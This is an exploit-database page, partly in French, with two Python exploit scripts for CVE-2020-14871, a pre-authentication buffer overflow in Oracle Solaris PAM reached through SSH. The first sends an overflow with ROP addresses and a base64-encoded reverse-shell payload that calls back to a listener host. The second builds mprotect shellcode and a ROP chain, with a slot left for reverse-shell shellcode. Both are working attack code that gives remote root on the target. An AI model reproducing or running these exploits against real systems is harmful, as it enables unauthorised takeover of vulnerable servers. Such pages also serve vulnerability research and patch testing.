# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2) # Original Exploit Author: Hacker Fantastic # Metasploit Module Author: wvu # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html # Version: 10 # Tested on: SunOS solaris 10 # CVE: CVE-2020-14871 # Ported By: legend import socket import paramiko from time import sleep payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe" payload+=b"python${IFS}-c${IFS}\"" # msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444 payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))" payload+=b"\"" print("Length => %d" % (len(payload))) def inter_handler(title, instructions, prompt_list): resp = [] #Initialize the response container for pr in prompt_list: print(pr) if pr[0].startswith('Please enter user name:'): sleep(10) resp.append(payload) print("Your payload is sended check your nc") return tuple(resp) import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("192.168.1.2", 22)) ts = paramiko.Transport(sock) ts.start_client(timeout=10) ts.auth_interactive(username="", handler=inter_handler)
Exploit Database EDB-ID : 50039

Date de publication : 2021-06-20 22:00 +00:00
Auteur : Nathaniel Singer
EDB Vérifié : No

# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (3) # Exploit Author: Nathaniel Singer, Joe Rozner # Date: 09/11/2020 # CVE: 2020-14871 # Vulnerable Version(s): Oracle Solaris: 9 (some releases), 10 (all releases), 11.0 # Description: CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6. The vulnerability received a CVSSv3 score of 10.0, the maximum possible score. # Vendor Homepage: https://www.oracle.com/solaris # Software Link: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-downloads.html # Tested on: Software Hash (md5): aae1452bb3d56baa3dcb8866ce7e4a08 2254110720: sol-10-u11-ga-x86-dvd.iso # Notes: We ran into an interesting LIBC descrepancy during testing. The sysenter gadget (0xfebbbbf4), last in the stage one chain, was accessible when the testing VM was running on a MacOS host, however, when we ran the vulnerable Solaris box on a Windows host, that gadget was not located at the same address and we actually were unable to find it anywhere in memory. Hopefully someone smarter than us can figure out why this is, but you may run into this during your testing as well. #!/usr/bin/python3 from pwn import * ########## BUILD ########## # mprotect shellcode, stage one to mark the page containing our shellcode as executable buf = b"\x31\xc0\x31\xc9\xbb\x01\x40\x04\x08\x66\xb8\x01\x40" buf += b"\xb1\x07\x4b\x48\x51\x50\x53\x53\x89\xe1\x31\xc0\xb0" buf += b"\x74\xcd\x91" # Actual stage two shellcode, drop into after mprotect call # ./msfvenom -p solaris/x86/shell_reverse_tcp -b "\x20\x09\x00\x0d\x0a" LHOST="192.168.1.215" LPORT=4444 -f python buf += b"<big bad effect here, as a bytestring; limit 512 bytes>" pad = b'A'* (512-len(buf)) # manual assembly of ROP chain due to pwntools chainer bugs, DWORD returns :/ g = [] g.append(p32(0x080431c3)) #ebp overwrite to prevent ecx corrupt and crash g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret g.append(p32(0x08072829)) #pop ebx; ret g.append(p32(0x08040101)) #write ecx value (0x0a) to address, prevents crash g.append(p32(0x0805ba07)) #pop ecx; pop edx; pop ebp g.append(p32(0x08046ee0)) #ptr(0x?,0x0x1000,0x7) g.append(p32(0x08043001)) #edx pointer to page+1 for mprotect g.append(p32(0x080431b8)) #unused ebp value g.append(p32(0x08072261)) #decrement edx so correct page addr g.append(p32(0xfefe2d8b)) #mov DWORD PTR [ecx+0x4],edx; xor eax; ret g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret g.append(p32(0x0805ba08)) #pop edx; pop ebp; ret g.append(p32(0x080431b8)) #addr of shellcode g.append(p32(0xfed86ca3)) #unused ebx value g.append(p32(0xfebb56f6)) #sysenter (ret into sc via edx) chain = b''.join(g) #assemble the list into a bytestring, final rop chain print(f"Sending Exploit: {chain}") ########## EXPLOIT ########## remote_host = "192.168.25.130” io = process(f'/usr/bin/ssh -l \"\" -o \"PreferredAuthentications keyboard-interactive\" {remote_host}', shell=True, stdin=PTY) io.recv() #username prompt io.sendline(buf + pad + chain) #exploit

Products Mentioned

Configuraton 0

Oracle>>Solaris >> Version From (including) 10 To (excluding) 11.1

Oracle>>Solaris >> Version 9

References


Plus d'informations
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.